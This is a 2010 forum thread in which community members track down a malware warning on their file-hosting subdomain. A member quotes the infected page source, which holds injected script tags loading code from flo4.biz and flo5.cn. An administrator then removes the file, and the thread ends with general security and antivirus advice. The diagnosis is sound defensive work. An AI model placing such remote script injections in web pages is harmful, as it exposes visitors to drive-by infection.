Please fix files.co8.org

Discussion in 'Site and Forum Feedback' started by DarkStorm, Jun 15, 2010.

Remove all ads!
  1. DarkStorm

    DarkStorm Established Member

    Joined:
    Oct 2, 2003
    Messages:
    514
    Likes Received:
    3
    Hello,

    for *weeks*, Chrome is showing me warnings whenever I open a thread with shiningted's avatar in it, because it is hosted in files.co8.org, which is infected by malware.

    files.co8.org includes code from flo4.biz, which is a malware hoster.

    Please clean this up!

    Regards,
    Storm
     
  2. maggit

    maggit Zombie RipTorn Wonka

    Joined:
    Oct 20, 2005
    Messages:
    1,945
    Likes Received:
    0
    Yeah, I get that warning on Firefox whenever I want to download anything (soundtrack samples, or any files) as well. Perhaps something for Taluntain to check out?
     
  3. Gaear

    Gaear Bastard Maestro Administrator

    Joined:
    Apr 27, 2004
    Messages:
    11,029
    Likes Received:
    42
    This is an old problem. Taluntain said that flo4.biz is not on our server, and that probably a neighboring IP on the network was infected and Google flagged ours as well.

    Agetian has requested a review from Google a couple times now, and Google has responded that they've checked the site and found it clean, and that they'll remove the warning, but then they never do.

    Not much else we can do. :shrug: It's sort of like dealing with the monolithic telephone or cable company.
     
  4. DarkStorm

    DarkStorm Established Member

    Joined:
    Oct 2, 2003
    Messages:
    514
    Likes Received:
    3
    No, check files.co8.org.
    This is the sourcecode of the page that is served when I go to files.co8.org:
    Code:
    <meta http-equiv="refresh" content="0; url=http://www.co8.org/forum"><script src=http://flo4.biz/1.txt></script><script src=http://flo5.cn/1.txt></script></script>
    See that script include there? That's the malware inclusion part. Most likely scenario: co8.org was hacked and that snippet was put there to infect visitors of files.co8.org (most likely an automated hack/trojan, there are several out there that do something like this).

    The only way to clean this up is to remove the offending code snippet from files.co8.org, *then* contact google (although google will most likely unflag files.co8.org once it respiders it).

    Storm
     
  5. Taluntain

    Taluntain Established Member Administrator

    Joined:
    Oct 2, 2003
    Messages:
    345
    Likes Received:
    4
    That one file on the files subdomain (which is completely separate from the main Co8 site) actually was infected. Someone apparently uploaded the old, infected index at some point after the move of the files subdomain off the old server during the move of the files to the new server (probably via an old, infected backup - this file was clean when I checked it last). In any event, I've cleaned it up now, so it should all be fine. Sorry for the inconvenience and if you spot anything like that in the future, let us know directly!
     
  6. GuardianAngel82

    GuardianAngel82 Senior Member

    Joined:
    Oct 3, 2007
    Messages:
    3,481
    Likes Received:
    5
    Good police work! I'm glad something was finally found! :thumbsup:

    I've never been a believer in the "false alarm".
     
  7. Sitra Achara

    Sitra Achara Senior Member

    Joined:
    Sep 1, 2003
    Messages:
    3,611
    Likes Received:
    537
    Oh my!

    Under what circumstances does that actually infect your computer?
     
  8. Taluntain

    Taluntain Established Member Administrator

    Joined:
    Oct 2, 2003
    Messages:
    345
    Likes Received:
    4
    AFAIK that site was shut down a long time ago. Such exploit redirects usually have a very short TTL so they just remain as annoyances. It's not an infection in the virus sense of the word.
     
  9. Shiningted

    Shiningted I want my goat back Administrator

    Joined:
    Oct 23, 2004
    Messages:
    12,641
    Likes Received:
    349
    Thanks Tal.

    Good pickup Darkstorm, sorry I (also) suggested it was nothing to worry about :thumbsup:
     
  10. DarkStorm

    DarkStorm Established Member

    Joined:
    Oct 2, 2003
    Messages:
    514
    Likes Received:
    3
    As pointed out already, the site was most likely down anyway.

    Usually they exploit security vulnerabilities in your browser or any installed plugin to execute code on your computer. From there on, it works just like any other trojan/virus infection.

    What helps: Keep your browser and any plugins (Especially Flash + Adobe Reader) up to date.
     
  11. sirchet

    sirchet Force for Goodness Moderator Supporter

    Joined:
    Dec 6, 2003
    Messages:
    3,721
    Likes Received:
    49
    Thanks guys, noted and appreciated.

    I'll be keeping my stuff updated.

    A question if I may?

    Completely, well at least kind of off topic, what is your opinion of Windows Defender?

    Can, should it be trusted? Is it enough by itself?

    Thanks in advance.
     
  12. DarkStorm

    DarkStorm Established Member

    Joined:
    Oct 2, 2003
    Messages:
    514
    Likes Received:
    3
    Definetly not.

    If you don't want to pay for Anti-Virus, and if you can live with a daily ad-popup on update, use Avira: http://www.avira.com/en/pages/index.php

    It's quite good, really.
     
  13. GuardianAngel82

    GuardianAngel82 Senior Member

    Joined:
    Oct 3, 2007
    Messages:
    3,481
    Likes Received:
    5
    I wouldn't mind hearing more opinions on this.
     
  14. ShadowDragoon

    ShadowDragoon Advocate of Vengence

    Joined:
    Dec 25, 2004
    Messages:
    579
    Likes Received:
    0
    I prefer Avast! Antivirus, myself. (I know, poking an old thread with a stick... sorry...)
     
Our Host!